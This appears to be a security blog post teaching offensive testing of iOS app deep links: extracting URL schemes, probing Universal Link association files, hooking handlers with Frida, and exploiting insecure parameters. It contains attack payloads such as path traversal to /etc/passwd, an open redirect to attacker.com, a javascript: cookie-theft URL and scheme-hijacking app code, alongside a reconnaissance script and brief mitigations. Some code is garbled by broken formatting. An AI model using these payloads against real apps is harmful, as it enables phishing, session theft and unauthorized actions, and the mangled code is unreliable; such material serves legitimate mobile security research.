Listen to this Post
Introduction:
Deep links in iOS apps—both custom URL schemes and Universal Links—create powerful user experiences but often introduce severe attack surfaces. Attackers can hijack these links to steal data, launch phishing attacks, or execute arbitrary code within trusted app contexts. Understanding how to identify, enumerate, and exploit these vectors is essential for both offensive researchers and defensive engineers.
Learning Objectives:
- Enumerate registered URL schemes and Universal Link paths from iOS apps without source code
- Use Frida runtime instrumentation to intercept and manipulate deep link handlers
- Exploit insecure parameter handling in custom URL schemes to trigger unauthorized actions
You Should Know:
- Extracting URL Schemes from Compiled iOS Apps (Black-Box)
URL schemes are defined in the app’s `Info.plist` file. Even without source code, you can extract this file from the IPA or from a decrypted app on a jailbroken device.
Step-by-step guide:
- Obtain the IPA – Download from third-party sources or decrypt an App Store app using tools like `frida-ios-dump` or
bfinject. - Extract Info.plist – Unzip the IPA and locate
Payload/AppName.app/Info.plist.unzip target.ipa -d extracted/ cd extracted/Payload/.app/
- View registered URL schemes – Use `plutil` or `defaults` to read the file.
plutil -p Info.plist | grep -A 5 "CFBundleURLSchemes" Alternative: convert to XML and grep plutil -convert xml1 Info.plist -o - | grep -A 1 "<string>"
- Extract all schemes cleanly – Use a Python one-liner.
plutil -p Info.plist | grep -o 'CFBundleURLSchemes" : ["[^"]"' | sed 's/.": ["//;s/"]//'
- Find path structures in the binary – Run `strings` with regex to identify potential path patterns.
strings AppBinary | grep -E "^/([a-zA-Z0-9_-]+/)[a-zA-Z0-9_-]+$" | sort -u Look for route patterns like "/user/profile", "/payment/confirm"
Windows alternative: Use `plutil.exe` via WSL or use `7zip` to extract IPA, then parse `Info.plist` with PowerShell.
After unzipping, use: Get-Content Info.plist | Select-String "CFBundleURLSchemes" -Context 0,5
2. Hunting Universal Links via apple-app-site-association
Universal Links use an HTTPS domain and a hosted JSON file. Attackers can discover these links even without the IPA.
Step-by-step guide:
- Extract domains from the binary – Use `strings` and grep for HTTPS patterns.
strings AppBinary | grep -E "https?://[a-zA-Z0-9.-]+" | sort -u
- Check for the association file – For each discovered domain, request
/.well-known/apple-app-site-association.curl -s https://example.com/.well-known/apple-app-site-association | jq . Look for "paths" or "components" arrays
- Enumerate all Universal Link paths – Use a wordlist if the file uses wildcards (
/app/). Fuzz with common paths.Download the file first wget https://target.com/.well-known/apple-app-site-association -O aasa.json cat aasa.json | jq '.applinks.details[].paths' -r
- Test link handling – On a device, create a notes app with a link. Long-press → Open in target app. Or use `open` command via SSH on jailbroken device.
open 'https://target.com/app/profile/123'
Exploitation angle: If the app accepts any path (wildcard), an attacker can craft malicious links that point to attacker-controlled domains but open in the victim app, leading to UI spoofing or parameter injection.
3. Runtime Interception with Frida (Hooking openURL:)
The real attack surface lives inside the handler methods. Without source, use Frida to trace what the app does when a deep link arrives.
Step-by-step guide:
- Install Frida on a jailbroken device – Follow frida.re docs. Then attach to the target app.
frida-ps -U list apps frida -U -f com.target.app --no-pause
- Hook `application:openURL:options:` – Save this script as
hook_openurl.js.Interceptor.attach(ObjC.classes.UIApplication["- openURL:options:completionHandler:"].implementation, { onEnter: function(args) { var url = ObjC.Object(args[bash]); console.log("[] openURL called with: " + url.toString()); // Print backtrace to see caller console.log(Thread.backtrace(this.context, Backtracer.ACCURATE).map(DebugSymbol.fromAddress).join('\n')); } }); // Also hook older method for compatibility var oldMethod = ObjC.classes.UIApplication["- openURL:"]; if (oldMethod) { Interceptor.attach(oldMethod.implementation, { onEnter: function(args) { console.log("[] openURL: (deprecated) " + ObjC.Object(args[bash]).toString()); } }); } - Run the script – Trigger a deep link from another app or Safari.
frida -U com.target.app -l hook_openurl.js
- Enumerate all registered URL handlers – Use Frida to iterate
LSApplicationQuerySchemes.var NSBundle = ObjC.classes.NSBundle; var mainBundle = NSBundle.mainBundle(); var infoDict = mainBundle.infoDictionary(); var schemes = infoDict.objectForKey_("CFBundleURLTypes"); console.log(schemes.toString()); - Modify parameters in flight – Use `onLeave` to change the URL before processing.
onLeave: function(retval) { // Change the URL object (advanced: use ObjC classes to create new NSURL) console.log("Return value: " + retval); }
Pro tip: Combine `frida-trace` with `-m “-[AppDelegate application:openURL:options:]”` for rapid tracing.
4. Exploiting Insecure Parameter Handling in URL Schemes
Once you discover a scheme like bankapp://transfer?to=account&amount=100, test for injection flaws.
Step-by-step guide:
- Fuzz parameters – Use Burp Suite or custom script to generate variations.
Example: Test for path traversal in the handler open 'bankapp://../../../../etc/passwd' open 'bankapp://%2e%2e%2fetc%2fpasswd'
- Test for open redirect – The app might load a web view using a `url` parameter.
open 'bankapp://web?url=https://attacker.com/phish'
- Chain with XSS in WebView – If the app loads your URL in a UIWebView/WKWebView, inject JavaScript.
open 'bankapp://web?url=javascript:alert(document.cookie)'
- Check for scheme hijacking – Register the same scheme in a malicious app. Install your app with `CFBundleURLSchemes` matching
bankapp. Then trigger the link – iOS might launch your app instead (race condition in older iOS versions). Test with:// In your malicious app's AppDelegate</li> </ol> - (BOOL)application:(UIApplication )app openURL:(NSURL )url options:(NSDictionary )options { // Steal the URL and its parameters NSLog(@"Stolen URL: %@", url); return YES; }5. Exploit via clipboard injection – Some apps auto-process URLs from clipboard using
UIPasteboard. Create a shortcut that writes your malicious scheme to clipboard and triggers the app.Mitigation: Always validate source application using
UIApplication.openURL‘s `sourceApplication` oroptions</code>. For Universal Links, Apple validates the domain, but handlers must still sanitize input. <h2 style="color: yellow;">5. Automating Discovery with Custom Scripts</h2> <h2 style="color: yellow;">Combine techniques into a single reconnaissance script.</h2> <h2 style="color: yellow;">Step-by-step guide – Bash automation:</h2> [bash] !/bin/bash ios-deeplink-scanner.sh - Scan IPA for deep link attack surface IPA="$1" if [ -z "$IPA" ]; then echo "Usage: $0 app.ipa"; exit 1; fi TMPDIR=$(mktemp -d) unzip -q "$IPA" -d "$TMPDIR" APP_DIR=$(find "$TMPDIR" -name ".app" -type d) echo "[+] Extracting URL Schemes from Info.plist" plutil -p "$APP_DIR/Info.plist" | grep -E 'CFBundleURLSchemes|CFBundleURLName' -A 2 echo "[+] Extracting strings from binary" BINARY=$(find "$APP_DIR" -type f -perm +111 -not -name ".dylib" | head -1) if [ -n "$BINARY" ]; then strings "$BINARY" | grep -E '(https?://|^[a-z]+://)' | sort -u > "$TMPDIR/urls.txt" echo "[+] Found $(wc -l < $TMPDIR/urls.txt) URL references" cat "$TMPDIR/urls.txt" | grep -E '^[a-z]+://' | head -20 fi echo "[+] Checking for apple-app-site-association" grep -E 'https?://[a-zA-Z0-9.-]+' "$TMPDIR/urls.txt" | cut -d'/' -f3 | sort -u | while read domain; do echo " Checking $domain" curl -s "https://$domain/.well-known/apple-app-site-association" -I 2>/dev/null | head -1 done rm -rf "$TMPDIR"
Run on macOS/Linux:
chmod +x ios-deeplink-scanner.sh ./ios-deeplink-scanner.sh target.ipa
Windows (WSL): Install WSL2 + Ubuntu for full compatibility.
What Undercode Say:
- Key Takeaway 1: URL schemes are inherently dangerous because any app can register the same scheme. Always verify the calling app's bundle ID before processing sensitive actions.
- Key Takeaway 2: Universal Links provide better security through domain association, but wildcards in `paths` can expose unintended endpoints. Always restrict to explicit paths and validate parameters.
- Key Takeaway 3: Runtime instrumentation with Frida is the most effective black-box method to uncover hidden deep link handlers – static analysis alone misses dynamic behavior.
- Key Takeaway 4: Parameter injection vulnerabilities in deep links mirror traditional web attacks: path traversal, open redirect, and XSS via WebView are common and often overlooked.
- Key Takeaway 5: The iOS course from 8kSec (mentioned in the original post) provides structured training on these techniques, covering kernel internals and advanced Frida usage for vulnerability research.
Prediction:
As iOS adopts more privacy-focused features like Lockdown Mode and App Privacy Reports, deep link exploitation will shift toward abuse of legitimate Universal Links via DNS spoofing or compromised CDNs. Attackers will increasingly target the server-side components of `apple-app-site-association` files, poisoning the path mappings. Meanwhile, URL schemes will gradually be deprecated by major apps, but legacy support will keep them viable for years – making manual auditing and Frida instrumentation a critical skill for mobile security professionals through 2028 and beyond.
▶️ Related Video (74% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: This Blog - Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow UndercodeTesting & Stay Tuned:
